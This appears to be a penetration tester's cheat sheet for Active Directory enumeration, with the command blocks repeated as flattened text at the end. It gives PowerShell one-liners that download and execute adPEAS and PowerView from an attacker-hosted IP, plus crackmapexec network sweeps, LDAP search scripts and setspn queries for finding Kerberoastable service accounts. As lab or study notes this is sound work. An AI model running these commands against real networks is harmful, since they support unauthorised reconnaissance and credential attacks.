Enumeration


IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.1/adPEAS.ps1');Invoke-adPEAS -Domain 'domain.com' -Server 'dc01.domain.com'
or
Invoke-WebRequest -Uri "http://192.168.45.5/adPEAS.ps1" -OutFile "C:\tmp\adPEAS.ps1"
Import-Module .\adPEAS.ps1
Invoke-adPEAS -Domain 'domain.com' -Server 'dc01.domain.com'

#with creds
$SecPassword = ConvertTo-SecureString 'Pass' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('domain\johndoe', $SecPassword)
Invoke-adPEAS -Domain 'domain.com' -Cred $Cred

Invoke-adPEAS -Domain 'domain.com' -Server 'dc1.domain.com' -Username 'domain\johndoe' -Password 'pass' -Force

ldap search

ldapsearch -x -H LDAP://192.168.222.122 -D '' -w '' -b "DC=hutch,DC=offsec" > ldapuser

CME enum network

crackmapexec smb 192.168.0.0/24

PowerView


IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.1/PowerView.ps1')

Invoke-WebRequest -Uri "http://192.168.45.5/PowerView.ps1" -OutFile "C:\tmp\PowerView.ps1"
Import-Module .\PowerView.ps1

Get-NetDomain #Domain info
Get-DomainController #DC info
Get-NetUser -SPN #Kerberoastable users
Get-NetUser -Domain msp.local | Where-Object {$_.servicePrincipalName}

Get-NetComputer

Get-NetUser
Get-DomainGroupMember "Domain Admins" -Recurse

Get-NetLoggedon -ComputerName <servername> #Get net logon users at the moment in a computer (need admins rights on target)
Get-NetSession -ComputerName <servername> #Get active sessions on the host

Tradition

net user
net user /domain
net user xxx /domain
net group /domain (pdf p.632 for enum groups)
net group "domain admins" /domain
net localgroup "administrators"

whoami /group
net user /domain
net localgroup /domain

Current domain

[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

PdcRoleOwner : DC01.corp.com (primary dc)
Name : corp.com

nslookup
set type=all
_ldap._tcp.dc._msdcs.sandbox.local

nmap -sC

net user /domain (as admin)

Build LDAP provider path

$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$SearchString

LDAP://DC01.corp.com/DC=corp,DC=com

Search all AD users / specific user

#$domainObj = dc01.corp.com # if as a local user instead of domain user
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="samAccountType=805306368"
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
    Foreach($prop in $obj.Properties)
    {
        $prop
    }
    Write-Host "------------------------"
}

$Searcher.filter="name=Jeff_Admin"

SPN

Find name for service account name and serviceprincipalname to generate ticket

may save as .ps1

# as a local user
$domainObj = dc01.corp.com
# or as domain user > [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

$PDC = ($domainObj.PdcRoleOwner).Name

$SearchString = "LDAP://"
$SearchString += $PDC + "/"

$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"

$SearchString += $DistinguishedName

$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)

$objDomain = New-Object System.DirectoryServices.DirectoryEntry

$Searcher.SearchRoot = $objDomain

$Searcher.filter="serviceprincipalname=*corp*"

$Result = $Searcher.FindAll()

Foreach($obj in $Result)
{
    Foreach($prop in $obj.Properties)
    {
        $prop
    }
Write-Host "------------------------"
}

alternative

setspn -T * -F -Q */* 
setspn -T domain.local -F -Q */* 

setspn -T $env:computername -F -Q */*  (if no domain name)

nslookup corpweb.corp.comer

Previouspersisting ssh login with ssh-keygen NextFlow

Last updated 11 months ago

IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.1/adPEAS.ps1');Invoke-adPEAS -Domain 'domain.com' -Server 'dc01.domain.com' or Invoke-WebRequest -Uri "http://192.168.45.5/adPEAS.ps1" -OutFile "C:\tmp\adPEAS.ps1" Import-Module .\adPEAS.ps1 Invoke-adPEAS -Domain 'domain.com' -Server 'dc01.domain.com' #with creds $SecPassword = ConvertTo-SecureString 'Pass' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('domain\johndoe', $SecPassword) Invoke-adPEAS -Domain 'domain.com' -Cred $Cred Invoke-adPEAS -Domain 'domain.com' -Server 'dc1.domain.com' -Username 'domain\johndoe' -Password 'pass' -Force

IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.1/PowerView.ps1') Invoke-WebRequest -Uri "http://192.168.45.5/PowerView.ps1" -OutFile "C:\tmp\PowerView.ps1" Import-Module .\PowerView.ps1 Get-NetDomain #Domain info Get-DomainController #DC info Get-NetUser -SPN #Kerberoastable users Get-NetUser -Domain msp.local | Where-Object {$_.servicePrincipalName} Get-NetComputer Get-NetUser Get-DomainGroupMember "Domain Admins" -Recurse Get-NetLoggedon -ComputerName <servername> #Get net logon users at the moment in a computer (need admins rights on target) Get-NetSession -ComputerName <servername> #Get active sessions on the host

net user net user /domain net user xxx /domain net group /domain (pdf p.632 for enum groups) net group "domain admins" /domain net localgroup "administrators" whoami /group net user /domain net localgroup /domain

$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() $PDC = ($domainObj.PdcRoleOwner).Name $SearchString = "LDAP://" $SearchString += $PDC + "/" $DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))" $SearchString += $DistinguishedName $SearchString LDAP://DC01.corp.com/DC=corp,DC=com

#$domainObj = dc01.corp.com # if as a local user instead of domain user $domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() $PDC = ($domainObj.PdcRoleOwner).Name $SearchString = "LDAP://" $SearchString += $PDC + "/" $DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))" $SearchString += $DistinguishedName $Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString) $objDomain = New-Object System.DirectoryServices.DirectoryEntry $Searcher.SearchRoot = $objDomain $Searcher.filter="samAccountType=805306368" $Result = $Searcher.FindAll() Foreach($obj in $Result) { Foreach($prop in $obj.Properties) { $prop } Write-Host "------------------------" }

# as a local user $domainObj = dc01.corp.com # or as domain user > [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() $PDC = ($domainObj.PdcRoleOwner).Name $SearchString = "LDAP://" $SearchString += $PDC + "/" $DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))" $SearchString += $DistinguishedName $Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString) $objDomain = New-Object System.DirectoryServices.DirectoryEntry $Searcher.SearchRoot = $objDomain $Searcher.filter="serviceprincipalname=*corp*" $Result = $Searcher.FindAll() Foreach($obj in $Result) { Foreach($prop in $obj.Properties) { $prop } Write-Host "------------------------" }